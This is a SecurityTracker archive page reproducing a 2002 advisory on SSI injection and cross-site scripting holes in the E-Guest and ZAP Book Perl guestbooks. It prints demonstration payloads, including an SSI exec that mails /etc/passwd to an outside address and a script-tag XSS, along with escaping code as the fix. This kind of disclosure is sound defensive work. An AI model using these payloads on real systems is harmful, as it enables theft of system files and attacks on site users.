SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   E-Guest Vendors:   Leung, Eric
E-Guest Guestbook CGI Script Input Validation Hole Lets Remote Users Execute Shell Commands on the System and Also Conduct Cross-Site Scripting Attacks Against E-Guest Users
SecurityTracker Alert ID:  1004663
SecurityTracker URL:  http://securitytracker.com/id/1004663
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 1 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.1
Description:   A vulnerability was reported in the E-Guest guestbook CGI script. A remote user can execute arbitrary shell commands on the system and can conduct cross-site scripting attacks against E-Guest users.

DownBload Security Research Lab issued an advisory warning of vulnerabilities in E-Guest. According to the report, the software does not filter the name, email, homepage, and location fields, allowing a remote user to submit malicious server side includes (SSI) or arbitrary scripting code.

After submitting malicious SSI, the remote user can view the guestbook to cause the SSI code to be executed by the server with the privileges of the web server.

A demonstration exploit is provided:

Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->

A remote user can also submit malicious script that, when viewed by a target user, will cause the script to be executed by the target user's browser. The code will run in the security context of the web site running E-Guest. As a result, the code will be able to access the target user's cookies associated with that site (if any), access data submitted by the target user to the web site via web form (if any), and take actions on the web site acting as the target user.

A demonstration exploit is provided:

Full Name: HI&lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;

Impact:   A remote user can execute arbitrary shell commands (via SSI) on the server with the privileges of the web server.

A remote user can conduct cross-site scripting attacks against a target user to access the target user's cookies associated with that site (if any), access data submitted by the target user to the web site via web form (if any), and take actions on the web site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.leungeric.com/share/getfile.php?E-Guest (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)





 	      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in E-Guest (1.1) & ZAP Book (v1.0.3)
Advisory number: 6
Application: E-Guest (1.1) & ZAP Book (v1.0.3) (CGI scripts)
---[ E-Guest 
Author: Leung Eric
E-mail: cgi@leungeric.com
Homepage: http://leungeric.com
Working demo: http://leungeric.com/eric/demo/E-Guest_sign.pl
---[ ZAP Book
Author: Sephiroth32
E-mail: sephiroth32@unitedff.com
Homepage: http://www.unitedff.com

Date: 28.06.2002
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload						
Mail me @: downbload@hotmail.com	




======[ Overview 	
    
--[ E-Guest is "...full feature guestbook written in Perl...". 
    Maybe little too much 'full feature' ;).
--[ ZAP Book is guestbook too, but it is more advanced than E-Guest.




======[ Problem  	

It looks that it is very hard to find secure guestbook. ;).
--[ E-Guest author wrote - "HTML tag filtering". That is true, but only
    'comment' is filtered, and there is still name, email, homepage and
    location, where we can put our nasty SSI or CSS code. 
--[ ZAP Book is different animal. In ZAP Book, almost everything is 
    filtered. Exception is 'post' variable, which contains user comment, 
    so again, we can put our nasty SSI or CSS code in 'post' variable.




======[ Examples

---[ E-Guest

SSI attack
~~~~~~~~~~
Full Name: HI<!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-
->
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just SSI attack.

CSS attack
~~~~~~~~~~
Full Name: HI&lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;
E-mail: downbload@hotmail.com
Homepage:
UIN:
Location: Beyond the light
Comment: Nothing special, just CSS attack.


---[ ZAP Book

SSI attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: SSI attack <!--#exec cmd="/bin/mail downbload@hotmail.com 
< /etc/passwd"-->

CSS attack
~~~~~~~~~~
Name: DownBload
Email: downbload@hotmail.com
Homepage:
Location:
AIM Screename:
MSN Email:
Yahoo! Screename:
ICQ Number:
Referred by: Search Engine
Entry: CSS attack &lt;script&gt;javascript:alert('HACKED BY DOWNBLOAD');&lt;/script&gt;




======[ Solution 

As i said in 'Makebook advisory', solution for SSI & CSS attack is 
filtering 
special characters from user input. 

---[ E-Guest
FIX: Add next code to E-Guest_sign.pl (or wait for fixed version :-):
...
$fullname =~ s/</&lt;/g;
$fullname =~ s/>/&gt;/g;

$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$homepage =~ s/</&lt;/g;
$homepage =~ s/>/&gt;/g;

$uin =~ s/</&lt;/g;
$uin =~ s/>/&gt;/g;

$location =~ s/</&lt;/g;
$location =~ s/>/&gt;/g;
...


---[ ZAP Book
FIX: Add next code to addentry.cgi (or wait for fixed version :-):
...
$in{'post'} =~ s/</&lt;/g;
$in{'post'} =~ s/>/&gt;/g;
...




======[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>. 
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, fi, Sunnis, 
Fr1c, harlequin, Astral and www.active-security.org.
Special shitz goes to: DarkMan from crohack a.k.a darkforum, and his 
stupid friend h4x0r.
		

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC